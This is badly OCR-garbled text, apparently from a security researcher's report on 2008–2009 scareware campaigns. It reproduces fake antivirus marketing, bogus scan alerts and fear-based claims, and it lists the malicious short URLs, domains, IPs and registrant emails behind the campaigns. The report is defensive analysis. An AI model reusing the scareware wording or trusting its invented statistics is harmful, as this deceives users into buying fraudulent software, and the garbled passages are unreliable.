Met PC Gevemepings syiteerm bert u Deschertned tegen 
aie Destaande Dedregngen! 
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about SOFTWARE FAQ CONTACTS 


a 200) an even eiering serverere vomees! iby ob hep yor Spanp bide pyeere End EoaerE 
inchuaing heyloggers, trojan horses, password theves and 


AntiSpywareGuard - COMING SOON! 


Reais revere ieee le SORENESS Deel vou SER Win Rghaet tone of pevbacten Open ain anyeure ane 
mahware incheding keyloggers, Myackers and downloaders. 

ane eatin SESE AR acenann Seaeerote nee mbnetn OO Sane eSane bneeene Ble ten Pom enar ae 
protection for your comeater wth our advanced AntiSpywareGuard Guard real-time mongor, 


Keep your computer free from trojans, spyware, adware, woems, heyloppers, rootits, Galers and other makoous 
programs! 


PopupNukerPre - COMING SOON! 


PopuptiukerPro is a a.tting-edge pop-up and ad banner blocking software whech automatically identifies and 
treubleshoets unnecessary windows. This anti-popup innovative solution wil prowide professional assistance in 
ehemmnating annoying elemerts before they reach your system! 
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Antivirus 2009 Protection 


mW FEATURES COWMLOAD REGISTIRWOW AITRUATES sum 


You need ws program because it's ureque, effective and atte to compete with many 
wrell known large software Comparses. M Certainty should be mstated on your PC - 
and you wil forget about Spyware and Adware wreckers, This Is the best protection 
‘softerere Of today among cher existing, $0 use tee scan 


About $2'% of all PCs are infected with threats that cant be 
identified by most security programs. 


as Nobody's safe today! Who can say for sure that his PC is 
, notintectec? 


The latest researches prove that $2 of aff home PCs are under the threat of 
infecton the man source of wtech is sail the internet. The vast majorny of Internet 
users fall for the bat of venous trading Companies and Commercial websites wtech 
make large scale Ostman of viruses Usually, these viruses get to inexpenenced 
users Ieough “treect charge” softernre products. 


So, what Is Spyware? 


Ths Is makevcient software whose aim 15 to supervise pour actions when you are on. 
bre. 


¢ AS S000 25 it is nobced Mat you are Internet amateur who thes to beowse 
find out more Doundiess open spaces of the Internet, pou wal Immediately recerve 8 huge 
eap of Afferent intormason (Commercials, Popups and pst Spam) trom 
tereide of your PC! 


Soyerere may harm your PC efficsency and show the speed of transfer into he 


They penetrate into your PC from mebsites you visi spam, even with tedden 
IP: 81,169.174,178 20390n8 of Bcense programs you had instated. The place of mfecton sherays 
‘fomannrs not Gefined. Some Anterus of Firewall programs Cannet find @ at aft 

Why choose Antivirus 2009 Protection? 


Antivirus 2009 Protection Is 2 leading program worldwide: 
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Antivirus 2009 


ems processed 282 
ERRORS FOUND: $8 


- Local Disk (C:) ~ Local Disk (0:) Local Settings 


@ system errors ad @ 00 errors @ infected 


(MALWARE THREAT 


Scan results : no virus detected 


Caprreght © 2007 2000 XP saterwws | All Raghts Reserved 
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6 tarry eaten Panto 


What is eKerberos? 


Overview 


Download 


Why is eKerberos better then standard 


antivirus programs? 


Technical features 
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Purchase 


Features 


System Security is your comprehensive, aBin-cne security sohubon Quarding your system against spyware 
EUSIONS. annoying adware, identity ek and all kinds of malware brooding on he net today Comdning 
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TotalVirusProtection HOE neers 


~ Malware Secunty 


The TotalVirusProtection can resolve the 
following problems 


Data Security 


Every seven days cus program t 
professes 

fenal secunty 

protected 
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tinyurl.com /msjjv8 
tinyurl.com /mj5wju 


tinyurl.com /mxg2vo 
tinyurl.com /m656h7 


tinyurl.com /nffkly 
xrl.us /bfnpv7 
xrl.us /bfnsa8 
xrl.us /bfny8e 
xrl.us /bfnnu4 
xrl.us /bfnzkk 
a.gd/ 6af3fe 
a.gd/ 649be 
a.gd/ f6b7f5 
a.gd/ Oabe74 
is.gd/ 3AoRZ 
is.gd/ 3A5DD 
is.gd/ 3AUVc 
is.gd/ 3BZqa 
is.gd/ 3C41U 


ibfny8e 


text/html 


HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 


imagination-1.com 
my-systemscan.com 
miy-s¥s' temscan,com 
miy temscan.com 
miy temscan,com 
my temscan.com 
my temscan,com 
my temscan.com 


my-systemscan.com 
my-systemscan.com 
my-systemscan,.com 
my-systemscan.com 


/Puid=138&pid=3ettl=b1d4e571b16 


}?p=WKmimHvla3GHjsblo22EhHysipnvbWeMn. .. 
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{build?_138.php?cmd=getFile&counter=2&p=... 


{feb7FS 


{Strategies/7 a06b79cdb03a4ed1394b..., 


/Layouts/Landings/CentralLandings/?7fimages/|... 


525 text/html 
1,780 text/html 


0 application/... 
0 application/... 
0 


application... 
text/html 


HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 
HTTP 


imagination-1,.com 
my-systemscan,com 
my-systemscan.com 
my-systemscan.com 


my-sy¥s' temscan.com 


miy temscan,.com 
my temscan.com 
my-systemscan.com 


/Puid=1388pid=3ettl=b1d4e571b16 


/?p=WKmimH¥la3GHjsblo22EhHV8ipnybWaMn... 


{Images/jloading. gif 


/Scripts/Strategies/6ad65F29d4977407cc968c... 
/Layouts/Landings/CentralLandings/6/images/|... 
/Layouts/Landings/CentralLandings/6/images/|... 
/Layouts/Landings/CentralLandings/6/images/|... 


/Layouts/Landings/CentralLandings/6/images/|... 


The short URLs rely on several redirectors to finally land the end 
such as securityland .cn and imagination-1 .com: 


securityland .cn - 64.86.25.201 - Email: 


are also: 


keithdgetz@gmail.com. 


527 — text/html 
1,780 ~— text/htral 


text/javasc... 


32,352  image/aif 


image/aif 


9 image/gif 


user on a scareware site, 


Parked on the same IP 
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Downtoad Buy ontine 


CA NVINDEFENDER 2009 


Get rid of mailware now! 


20 Aug 2008 


iited ieee et one Rosai eseeeds 


Click here to start free scan od 


About WinDefender 2009 


Windefencer 2009 was designed from the core a5 2 smigie, highly-cotrraed engine that works as 2 


by analyzing code execution for malcous ntent - keeping you ahead of the malware-wrters. 


30 day money back guarantee 


uy 2 subscrption today and get a ful 30 day money back guarantee, Wth 2 subscrotion you pet 
Dermanent, easy and professOnal protection from wruses, Nackers and data4oss. 
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&”) yp annviev: 
F prot 


ction 


ied with your current Windows antivirus 
oftware ? 


TRY Fave 


Home 
About Product 
Dowriosd 


Regster Now 


Suppert 
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on ated eegoy your 
rare and wrures 


$ How XP antivirus can help you? fee en a 
xP anittvirus & designed to provide you with the highest level of protection 
against makoous Spyware and mabware Induding heylogpes, Nyackers and PROTECT YOURSELF ! 
downloaders Is your computer infectac? 
xP antvirus technology protects you fom both known and emerging threat ‘Stop spyware ard spam 
Verunits ad gives you real-time protection for your computer with our infecting your PC! 


advanced XP antivirus Guird real-time monttor — 


Keep your computer fee from trojans, spyware, adware, worms, heylogoes 
fOottS, Galers and other makoous programs! 
Find out right now with our 


Why spyware is dangerous? FREE SPYWARE SCAN 
Spyware & the most prevalent treat to online computer privacy and securty.It 


is Petabed on your Computer through webwites, spam and a5 hedden aaddinons t 
legtmate programs you metal 


Spyware bring: bts of damage in the serwe of cists comfiderttiaity. Spyware 

programs regster every user step, both nade the system and in the Internet 
Al formation 6 Gebvered to the maiefactor who cofects data in hs, not your 
rherest) 


The whole procecs tubes bean thu 
‘S maretes and ic FREE of al charge 


[22] 


ADWARE PROFESSIONAL 2010 itz 
Oka Me betrcgy [res 


Hemme Page FAQs Download About 


Try our FREE Scan to see if your PC is Infected 


: 1 2 3 


“Anti-Spyware Made Simple!” Help 


HAVE A QUESTION? 
* Removes and Blocks Spyware, Adware, Viruses, and Trojans. LIVECHAT 


© Kills Beowser Hijackers, Keyloggers, Dialers, Bots and other theeats. enh nnn 
© lenercepts and Destroys All Foems of Uerwanted Pop Ups. 
® Frequent software updates provide optimal PC presection. 


© Ultra Easy to Use . 1 Click of the Mouse Fixes your Compater. == Dee 
fetce 24ua 
* Free, Uniinined Live 24/7 Customer Support. Oe cuicacs 47,023,977 
accion Cas 
Adware Professional has been downloaded over 47 Millon times by people in i... . 
a re 
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Total downloads: 991590 


Last update Thursday, April 16, 2009 
Total vitus records 728674 tees 


etttti.. Pm 


&V TRUE LIFE STORIES: 


© Steve J of New York had hes sofware projec 
stolen through a toyan that got into his computer 
through some internet ate Steve is still suffering 
from a strong depression _ 

®@ Jason W. was teed because he has been visiting 
sore prottited wviernet sites forn an office 
cornputer. His boss opened the web browser's 
history and saw all the estes Jason has been 


visting Jason is stil unemployed. 


72% of all spyware is not detected by the major Anti-virus programs. Ory a 
purposely built spyware removal tool such as Antivirus + car | 


© Antivirus + features: 


© Spyware removal . detects and removes spyware programs and 
trojan horses instatied on your PC 

© Homepage Monitor Tool - browser Hijackers, belonging to the family of 
spyware and adware, are capatie of taking control over your | 
homepage and other tavonte pages, and set an unknown weteite os 
your homepage 

© System clean-up - clirménates the faces of your systern activites 

© Disc clean-up . securely Gestoys all the data on your old hard disc 

© Quarantine - The intected files that cannot be fixed of deleted are 
moved 1o a quararaine folder and displayed on the Quarantine pane 
of AntiVirus. 

© User-friendly Wizard Mode . the Quick Scan Wizard will heipyourun 
8 scan m the basic scan modes 

© Autorun Tool - if you want to know what apelications run automatically | 
on your system after Windows boots, 

© Open Ports Tool . wthout a protective applcaton, your system ts 
Gelenseliess and becomes highly vulnerable to Trojan programs 

© Mary other features 


‘9 Is my PC infected with SpyWare?_ 


OQ Do you receive « large quantity of SPAM (unsolated 
advertisements}? 

@: Your PC is running extremely slow? 

Q You are pestered by those horrible popup ads? 

OG Your homepage keeps changing? 

© New bors appear om your desktop? 

©: Do you get toolbars in your browser fat you dont want? 

© Do you download any must files torn the temet? 

O Do you downioed and erstall free software for the imemet? 

OQ: Do you use any P2P Me exchange systems (P2P) - for exarngle | 


iiineren! O8fTarrent Meares ofankew Acsinfistews ond Marne? 
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2009 Best AntiMalware/ Adware removal 


effi iciency. 


The most efficien are TX 


100 


ncy 


e 


EF Fic 


Virus — Kaspersky ‘F-Secure ESET Webroot BitDefender ‘Norton 
Shield Anti-Virus Anti-Virus Nod32 Antivirus Antivirus Antivirus 
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What is Antivirus Agent Pro? 

You are tired of searching for the best and most secure arrtivinas.an the met? 
Your searches have ended up Antivirus Agent Pro is the most up t date 
and high quality security soffeare you Gen trust in today’s plentiful word of 
supply and demand What we offer you afows forgetting entirety about all 
winds of: 

© Adware, spyemee, beytaggers. 

© Trojans, browser hijackers 

© Sxiden crashes, Gerrans performance 


© Stow internet connection, anroying popups 


In this progressive word promising the fastest performance im simost all spheres, especalty in the ema of Informetonal 
Technologies 5 men deserves t be provided weth the quick and test customer services and most up to det and hugh — 
Quelity products. Quality stands as premium factor for the consumer whe strives tp find the products best mexting their 
Gemands How successful the chowe is depends on many factors. 


1m general the higher the costs are more is the possibility © find a really high quality and professional peaducts. 


What can you expect from Antivirus Agent Pro? 


For the people who uses PC Spyware represents 4 giotel problem category, fis is security issue whech bet you thevk of being 
provided veth spam scripts flooding your AC wath ad popups. 


Antivirus Agent Pro will help you protect your PC from importunate emails which may tmhe into possession your persona! 
informegon such as passwords, login details and credit ard information. 


PC users should be first of all sure that the virtual space they ust and they are in most part of the day is smcunely protected 
Teoas and VerUSeS may Crush your syskemn amd make your "User" life a rent meghenare 
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© Latest Threats 


Trojan-Dowe lancer 35 Sma 
‘Trojan-PSW.Win32.OnLineGames 0 
Trojan-PSW Win32.OnLeveGames.tfi 
Trojan-Downloader_Win.32_Agent.nmi 
Trojan-Dowe loader Win32 Braid update ¢ 


Testimonials 


© “The Antivieus Agent Pro tet has made a 
semethatte difference im both speed ara 
susteinabetity of my competer system. Thanks!” 


Alex, Boston, USA 


© “Tdid 6 fret xan t understand the impact viruses 
hed on my pc. Loves very amaand to find out thet 
tesdes 8 viruses the softwere also found spyworns, 
odwares and trojans and keyloggers ” 


Arnold, Hastings, UK 
© “In bess than fine minutes my computer was Geen 


No more viruses, spyresens, acwares, tropens, 
efoggers. Ian onty recommend ActiVirus Agent 
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Malware Destructor 2009 
Powerful and efficient internet antivirus suite 
© Protection against virus threats —— 
o lteliget proton asses ation os! Slane l- 
Protection for ICQ and IM clients 
9 Low CPU load 


Download Now Y 


Internet Threats Free Online Scanner Features 
: witewre 
In + ADVANCES DFOTECTON BQENET SOYRErE Bnd adware. 
— + Real-time OrOtecton agers! seauty Treats when veng 
Alert Level Mediom Scan your PC pa 
Protect your PC Now Set crenecton from beng modified, stoped or even, 
rwatales by erate sovkketon 
low Ovloot 
Compatiie meth Windows IP, Windows Veta 
free support 24/7 mh touch 
Best AntiMalware/Adware removal efficiency. 
100% 


LAPTOP 
EDITORS’ 
CHOICE 
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eor, 
MalwareRemoval! © Home © Remove Win PC Defender © FAQ's © Support QOowNLOAD NOW 
sev WAR. A ses 


wv | Click Scan & MalwareRemoval 
wv Quick Scan Technology 
wy 100% Safe and Secure 


SS Scan, Remove & Prevent = | Why Malware Removal Bot? 


omptetety Removes 


Malware Remov 


Wine tercter 
feare 100% of Matware from 
ur Hare ve & Regastry 
sitive Sirgle-Click Controts 
in Backup and Restore 


Prevents System Slowdown 


freee nee y 


_ Delete WinPCDefender and Remove Malware 


Get protection from the latest online treatm. The scasnmers behind Win PC Defender will stop at 
aa nothing when i comes to tricking you. What's worse & that rogue programs Ske this often dom’ travel 
mp e atone, but instead are ferried by clarsiestine Trojans, agents that pet Spyware and Adware on your 
e.3 system There's no doutt that the work! of malicious software has grown complicated and powerful But 
ht @unkfully, MatwareRemovaiB OT proves you wih a way te combat the most serious dangers 
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Advanced Features: 
Reot-Level Removal of WinPC 
~ Detender 


Powertul Smart-Scan 
~ Heurtstcs 


Completely Deets Malware, 
Adware & Spyware 


Disables Harmful Programe 


Boosts System Speed & 
Performarce 


Stops Matcious Programs from 
~ Runsing on Startup 


Includes: 
All current updates 
Free 24/7 Technical Support 


Minimum Requirements: 
100MHz Processor 
Windows 98, ME, XP, 2000 - 
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#8 Cleaner2009 


You are Not Safe! 


What evidence does your computer have? 


Prwvate comparees are Yacng Me ISPs to record po 
Oranboats tor evidence SaTiply Celetng hese Mes ¢ 


could 


internet Detun 
08s not get nd 
Mes yOu are Mot even aware Cf Pre Hes Mat Cet mstatbed by remsen 
OOOH E FOU Career your Mamiage oF pour Overa® status Quo 


of and 
De evidence 
ves and 


© THis 1s HOW COMPROMISING FILES GET STORED IN YOUR COMPUTER! 


eihes pou Reve visited Tem af! 
teowse websites © Steath Mes are These tes leave backs of Sumoty deleting hese tes 
SUT et ates Ovetnhs wed © your hard ye ane Denson ad ts Mot encugh 
ft recenve Gre wehout your gempeorre 9 realy gets nd 
poemogy agit: content pees sion creat Cand infcem amon 


© This is HOW COMPROMISING FILES GET STORED IN YOUR COMPUTER! 


na ‘Scams and removes Internet (eco, Demoor ary More 
Ss Ses ard vociess date for you PC 
e Prevents you fom beng steed oF Caught with 
ee inappropriate fier m yas computer 
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RapidAntivirus Myrnees Gin tert Sor be " 
tnfected with spyware CAN 


Protect Your Computer Now! 
Secure Yourself Against Fatal Viruses And Worms! 


* Removes Spyware 

* Removes Adware 

* Clears Cookies 

* Blocks Phishing 
Attacks 

* Kills Browser Hijackers 

* Free Customers 
Support 


Recommended: 


_ ur Rag rtrvir all tect your PC from ior twat kers ar Jata Download now! 
\ 

Basic symptoms of spyware infection What is spyware? 

“If the answer to ome of these questions is "Yes", then you are Spyware, like a virus, is a malicious software planted on your PC by a 
probably infected. third party in order to secretly monitor your online activity. Once your 
- Your computer has slowed down browsing habits are analyzed, you are flooded with endless 

- Your Internet connection speed has decreased Commercials, Popups and Spam from inside your PC! Spyware also 
- You have downloaded music or software froen the Web dramatically slows down your computer and Internet connection speeds. 
- You get popups and annoying ads when you're online or Spyware collects your private information and steals your identity, 
sometimes even offine passwords, credit card details and other financial data. 

- Your default home page has been changed to the one you 

Gidn't ask for 

- You have an extra toolbar installed, and you don’t know 

where it came from 


- You receive more spam emails than ever 


Privacy Policy | Terms Of Use! Legal! Refund Policy 


[30] 
26211 


‘Seth to XP Antivirus and enyoy your system beng free of weuses, 
SOY wero, adware, end Cther securtty Ie eats m pst a second 


y omart Antivirus 2009 


TRY IT FREE 


Not sa9sSed with pour current 
?) @ Hore ors rome Orrice ] Soot ons worun Berens EH tnerveaes @ Tecmrowsy ceveny 


Windows Antivirus Sofware? 


Lotest vius alerts 
ee How can Smart Antivirus 2009 help you? 
W322 Backtocr | 

Worm Cherncty® a 

W22 feOeteter £2 5 
Worm Tragae OtfcevViorm & 


‘Sean Antvarss 2000 4 the Naghest level of protecton against Ihe Breats of 
VTUSeS and spyware Rhas been designed to keep your PC secure Smart 
Aptranes 2009 guarartess Te heghest Mevel of protecbon for your systen? 


VIRUSES afd MabOOus PROG AMS iMmtanty Wad lo System Meares crashes 
20d &3 slows7wns Smart Anburus 2009 technology safeguards you fom a8 
MIE) INOWN ANG fiw VHUSES ANS MakGus programs B ofers tote rea 
tere protecton for your PC 


Use Smart Antvirus 2009 99 opemice and repair your PC 


Try Smart Antivirus 2009 now! 
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abclilab .com 

Olenfo .com 

ynoubfa .cn 
protectinstructor .cn 
immitations-all .net 
llimbo .net 


imagination-1 .com- 64.86.25.202 - Email: gertrudeedickens@text2re.com. Parked on 
the same IP are also: 

bombas10 .com 

graves111 .com 

iriskas .com 

yvicawo .cn 


Where do we know the gertrudeedickens@text2re.com email from? Several of the scareware 
domains pushed in the [1O]ongoing U.S Federal Forms Themed Blackhat SEO Campaign have 
been registered using it, that very same blackhat SEO whose central redirector a-n-d-the 
.com/wtr/router.php - 95.168.177.35 - and in-t-h-e.cn - 72.21.41.198 - (hosted by Layered 
Technologies, Inc.) mimics the campaign structure of 2008’s [11]massive input validation 
abuse attack using iFrames, courtesy of the RBN and the very first scareware campaigns. 


Moreover, the same email has been used to register two of the "phone-back" domains 
for the scareware pushed in the blackhat SEO campaign and the [12]NYTimes.com malver- 
tising attack - windowsprotection-suite .net - Email: gertrudeedickens@text2re.com and 
securemysystem .net - Email: gertrudeedickens@text2re.com. 


2624 


The Most Dusted Asd-Spyeare Avediatie’ 


y 


~S} ~—Ss are YOU sare? 


OVER 90° OF ALL PCS ARE INFECTED WITH SPYWARE! 


Hare ul Adee are a6 


fa PROTECT YOUR PRIVACY B® SCANS FOR ALL SPYWARE | [ily TAKE ACTION NOW! 
Mv SECURE YOUR PC! s, OUT THERE TODAY! = SCAN YOUR PC FOR FREE! 


You PC is probably Infected # you ‘Scam your PC's Processes, Memory and Dont let Soyware and adware pwede 
Oomnbond Mosk Online. Protect your System Regetry lor Pedder and dormant your Prac! Try Sppmare Remerer 
Privacy, Stop identity Theft, Popup Ads Soymare, Adware, hovers, Casiers, for FREE today and see for yoursel # 
and Privacy Inwason! wwrormes and other formes of Malware you computer is Wheto? 

BLOCKS AND BLOCKS worms BLOCKS ANNOYING 

REMOVES VIRUSES! AND TROJANS! Y POP-UP ADS! 

Protect Yourset FREE PC Scand : TREE Download Now! 
>. Home | FAQ | Textmormsts | [FEE Oowntosd | Support | Attliates y 


o¢) extency 
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are Guard 2009 


here 


Contacte 


@) What is Spyware: ®) What is Spyware Guard: 


Spyware ts computer sofware iat ts instated 
SuTepebously on a perbonal computer to intercept or 
take Partai Control over he user's interacton win He 
computer. without the users informed consent 
Nowadays soyware is externy harrts and realty 
dangerous 


Spyware Cuard 2000 ts a bphtwergtt tool prowaing your 
PC's ummnate satety in one single kk Resigental scanner 
@asity SCANS efter Compiete PC or needed folders and 
TeMOveS UNWaMted EDyware. Malware and even wrUseSs 
One of the stompest sotuton in he maustty, Spyware Guard 
res pou best to protect your data - now and today! 


&9 Basic functions: 


@ PertectFit hewistic technology, automaticaly detecting 
all the spyware, malware and viruses on your PC and 
Geleting it 


Ureque user interface, providing you with all basic 
functions frorn a single tab: pretty and smarty 


SmartScan technology, giving you abslty to scan either 
the whole drive or common foklers 


Adatonal mode for spyware detecton, protecting your 
PC even when active protection is turned off 


instant virus and spyware signature update and support 
wa website or E-mail 


biome | Download | Help | Contacts 
1 
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Sytem Tasks 


[2 Yew system mtormanon 
i 66 o remove progans 
> Change a setting: 


File Download 


Other Pieces 


ae Local Ok (C) 


Sy Hy Network Places 
CD My Cocumerts 
© Seared Qoamenss 
D Contre Pane 


= 


From 


Security Warning 


De you want to run of seve this file? 


Name lestal-9820_2017.en0 
Type Application, 16acB 


Run FREE spyware scan 


To remove al the spyware from your PC 

you can run easy, safe and absolutely 

free spyware scan 

You't be redrected to Gowrload page. where 
you can get special edition of Spyware Guard 
which functionality is trnited to scanning 


if you need instant arxd active protection, purchase 
Spyware Guard 2009 for $49.95 (single tcense) 


only 


Legal | Privacy Policy| Refund Policy | Terms of Sernce 


Windows Security Alert 


OF To help protect your computer, Windows Web Security has 
WF detected trojans and ready to remove thee 
XN 


Detected spyware and adeare on pou computer Fer vain 


© Admess Trojan 
DB exer. Traespender. Trojan 
) Wetert. TrojenDownioader 


Os renee naw ¥ 


aun oF cae Bas coftnane, 


Pon Save ( Carcet 


‘While fet hom the Internet can be uel, thet like hoe can 
potentially haem you Computer Il pou do mot Wust the noece. do mot 
What he mb? 


ts softrrare, whch Can gather eftormation trom user's comenter through 
Connection and send them te ts creator, Gathered information can be 
emnal adcremes and all that deta, which @ important for you. 


> 


ete State Od 
Critical 11.8. 2008 Waarg cerca 
Cretcal 14, 48 2008 % War remo w 
Craal 14.1 2008 s Werg renee . 


‘Ths crogram & cotertaly dangerous for pow system. Trepae-Oownloader stealing paspeonds, edt cards and otter 
pertonal reformation fom you computer 


Adee: 
You need to remowe fs Preat a3 soon a3 Sosstie! 
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 SpyWare ts part of an overall public concern about privacy! 


| Adult screenshots found on your PC | Last adult URLs visited Type 


| # http://porn-youtube- 
8.convhardcore/1/1/1a4f28/0/0/ 


Teens 


Pornluie 


| Download scanner to wipe these traces and keep your PC clean. 


Total infected files:[1] Main progress:[37%] 


Adult content traces found on your PC, your online activity is exposed to anyone 


CWindows/system32/wbdbase.sve 


Infected level Found Viruses 


) Criticat | Name Type Threath level 


Danger 8 SillyDl Spyware HIGH 


Low! 


— 
Recommended: Click the "Erase infected” button to erase all spyware and viruses from Windows Erase infected 


\ 
| 
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“Antivirus 


Areovevs V.LP acorove Dat wns 
and tojan ettacks Gamage more 
thn 14 onhoy ard Te new 
rus appears each how. Ore of 
hem, veus Sesser, A. nected 
mmiion of computers at the frst 
hous after let out and cased 
bitore damages. it had been 
corrected miter a let of mors. 


Your safe web-surfing solution 


E REALIABLE 
MORE EFFECTIVE 
E PROACTIVE 


Antivirus V.I.P key features 


© Ful Windows IP Service Pack 3 Seauty Center Sucpert! 

© Rescvescan Tedwwlogy - WHR Ultra tagh speed scan rescueng you's PC from viruses for 
few seconds! 

© Ulomate Live Update » Each 2 hours ant-vrus bases and modes are completely undated. 
Annies V.LP stands serine over you privacy and ernety! 


© Anbvrus V.LP finds out and removes more than 300000 Trojan horses, Soyware, Viruses, 

© Arts V.LP allows scan fies qucty and access other featres Antivirus ¥.1P drecty 
fom Widows Expiorer; 

© Remowes “actu bajar” fom o dak even # itm blocking the Me: 

© Removes Pojen fies are locked for writing (for example. OLis beng ueed); 

© Bett backdoor and worm protecton: 

© Shpports compressed Ses scan; 

© Reports and Actwity Log functonality; 

© Wut Removal Assetant can force dean the sh.oborn tojars arc spyware than the otter 
removal tools cannot; 
‘The Sehever Anatyss Techroiogy can find out the unknown trojans and spyware better; 


© The schedkied scan supports automate scan at spectied tme; 
(© Lowest OU uaage rate, best performance and modern user Gt. 
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Virus Response 


‘‘~/ ab 2009 


Protect Yourself 


Sop Soyerare and Spam fom 
infecting your PC 


ra) Live Updatet 


The Uve Update feature allows 
you to keep VrusResponse Lab 
2099 up-to-date to the Brest 
known Soyware threats. 


“a 


A No one 6 safet 


According to the Natoral Cyber 
Securty Alance, 9 cut of 10 
computers with an Iemet 
Commection are infected wth 
sy Ware, wthout imowledge or 
aoprowal. Commercial websites, 
“free” software and marketing 
Comparnes are mansvely 
Garrbutng dangerous Spyware 
that put you at rk. Find out 
fight now wth cur 


pywar 


MactlewsWorkd: “Soyware © 
‘evolving Pho a morater that might 
spon become more wiccus than e- 
rad spam and vrus attacks 
combined.” 


TheRegister: “73,000 Trojan horse 

1,000 system montorng prograrrs 
and 2.3 milion adware progars na 
sxan of only 420,000 PCs...” 


Spyware and Soam are the world's leading threats to your computer's securty today. A®er just fve 
minutes surfing only a few pages on the Mtemet, you may have unknowingly Gownloaded more 
than 10 spyware aopications that od expiot your computer. Sending and recewng erred 
makes your computer just as vulnerable to annoying and melcous spam 


Sxans your ertire system for rfections using our 
exclave threat database that gets updated every 
single how, Scanning 6 an easy 3-s8eD process by the 
€n6 of which your system wil be clean of Al spyware 
dangers. 


Brand-new reattime montor for any kind of spyware 
— Of adware attacks attempted on your machine. After 
tts you clean your sytem, © Spywall wil keeo 
Monitoring cowatching your baci. You'l never have to worry 
aot wyware agan 


Soryrware 
Scan 


This reabtene fRerng program monitors and blocks af 
coring sam, keeping your Mbox Clean of annoying 
(and sometimes dangerous) messages. 


Berg atoratcaly rtegrated nto your browser, & 
wil rake you forget about comrrercal pop-cos sooner 
than you can Fragne! 


What is Spyware ? 


Spyware (¢.9. vrus) 6 makious software planted on your PC by 2 thed party in order to secretly 
montor what you do online. Once your browsing habts are analyzed, you are fooded wth enciess 
Commercas, Poo-v9s and Spam from made your PO Soyware dramatically slows Gown your 
corrouter and Itemet connection speed! 


Spyware cobects your pevate nformation and seals your Gentty, pasevords, crest card details and 
other fnancal data 


2 To earn more about WrusResponse Lab 2009 cick bere, 
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VIRUS SHIELD Language Engish & 


Virus Shield 2009 

Powerful and efficient internet antivirus suite 
© Protection against virus threats 

© Intelligent protection against spyware and malware - 

@ Protection for ICQ and IM clients 

© Low CPU load : 


- Fast automated updates 

- ResHome protection against meScious and suspecious 
software 

> Advanced protection against spyemre and adware. 

~ ResHime protacton against securtty treats when using 


: Med | 1CQand M cients 
Feta te a | Scan your PC > Selt-protection from teers modified, stopped or ewer 
Protect your PC Now Tis simple, fast and FREE, cas me 


> Low CPU load 
- Compatible with Windows XP, Windows Viste 
~ Free support 4/7 in touch. 


2009 Best AntiMalware/Adware removal efficiency. 
he mt ert female re a are een ae utr No 
T FJ an point ' 
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home downlod buy onin 


“If the answer to ane of these questions ® “Ves”, then you are 


probably infected. 


. 


What © spyware? 


30 day money back quarantee 
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@ ADVANCED ANTIVIRUS 


Basic signs of Spyware infection A comeustet and temnet conmecto 


“if the answer to one of these questions ts “Yes”, then you are probaty infected 


tre parn ¢ tan eve FOR WINDOWS 
SB/ME/2000/XP/Vista 
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tems processed 


vv Viruses found: 3 


Virus status 


GE) Uniate security srstern 
G) tmorave malware protechon 


System Information 


1 208.683.222.128 
Locations Uruted States 
‘OS: Linux 

Browser: Morilla 


Security status: Processing... 


Nard Orives and Shared files 


— Local Ovsc (C) 


Process: Safe Files scan 


Sg 1x21 disc (0) 


Torepairyour system and get real « time protection, click “Protect Now". 


Attention! 
» itis recomreended that you install full real-time antivirus protection against external attack for safe browsing. 
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Shared Documents 
iv] security normal 
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AntivirusBEST ™ 


—r = _ 


removal uality will help you fighting all kinds of 


Spyware aso dramatically slows down 


your computer and internet connection —— - 

apeeds Basic signs of Spyware infection 

Spyware collects your private © the anmwer to one of hese Questions is “Yes”, then you are protably infected 
information and steals your identity, 

pasewords, credé card details and other 1 Your comeuter has slowed down 


2. Your Internet connmecton speed has deceased 
START FREE SCAN — 3 You have downloaded music or software trom the Web 
4. You get popups and annoying ads when you're online or sometimes even affine 
5 Your default horne page has been changed to the ome you Gin’! ask tor 


. 6 You heave an extra toolnar inatalied, and you dan) know where it carne from 
7 You (ecere more sparn emnaiis than ever 


CHECK YOUR PC NOW 
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The following scareware domains are not just used within the Twitter campaign, some of them 
have also been detected as part of blackhat SEO campaigns: 
ekevuc .cn - 64.213.140.68 

windowspcdefender .com 

smart-virus-eliminator .com 

fast-systemguard .net 

opyhila .cn 

riwryse .cn 

adijef .cn 

dunhah .cn 

idisuan .cn 

wobcyn .cn 

upuoro .cn 

ucyilwo .cn 
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“© Antivirus XP 2008 | Your safe web suring solution 


Geniune 


MORE REALIABLE 
MORE EFFECTIVE 
MORE PROACTIVE 


Scan your system for free now ©) 


1 Winl2,PSWOrireGames 
2. Win] Adeare. Ve tmonde 
3. ator 
4 Wind2Pacex.Gen 
Stanstcs aoorove Tat vis Astrewes XP 2008 bey features 5. Win 22/Aceare. Searchas 
and trojan attacks Gamage more 
fan I mlorhou and te new Phil 6. von33/Toobar Myrabsearch 
sete aoa ne act © Resovescan Tecnology - Wh Ure tagh speed scan rescvere you's PC fom Veuses for few 2. Wand2ROBot AAs 
milion of computers at the frst seconds 8 Wand2Qhost 
news afer let ot and coused © Utmate Une Update - Each 2 hours ant-wrus bases and modules are completely undated. 
batons damaget. It had beer " 9. T(TrojarQoumtoader. Wiad NW 
COFTECIOS nate 2 et of monte Anivns IP 208 stands serine over you privacy and Wenety! 


20. Wind iagere 
© Antvrus IP O08 finds out ard removes more Dur 990000 Trojan horses, Soyware, Viruses, 


Hackers, Adware, Kevlaggers and aretter harenare: 

© Antvrus IP 2008 shows scan Mes Qucdy and access oer features Antwrus IP 2008 Grecty 
fom Vindows Explorer 

© Removes "“actve trogen” for 2 Gat even if ts Diocing Me fe: 

© Removes rope fles are locked fr erarg (fr exaroie. OLLs berg used: 

© Best backdoor and worm protectors 

© Swoperts compressed Mes scary 

© Reports and Actty Log Actorality; 

© Vrs Removal Assstant can force Gean he stnbon Pojans and spyware an he oer 
removal tools Conmet, 

© The Behavior Anaiyss Technology can find out he unknown Toye and spyware better! 

© The scheduled scan sunperts automate scan at speotied te 

© Lowest CPU usage rete, Dest performance and modern user Gul. 
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. Antivirus 2008 Installer 


= Antivirus 2008 


ASE = Welcome to installer! 


This program will download and install 


Antivirus 2008 on your PC. 
we By clicking continue button you are accepting 
our Terms and Conditions. 
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© Doctor Anitvirus 2008 


Doctor Antivirus 2008 


Protect your PC 


7? System Scan 
e - © Backdoor 
Security © Backdoor 
@ Spyware 
os Privacy : — 
o - Spyware 
Update @ Spyware 
# . Trojan 
ty Settings © Spyware 


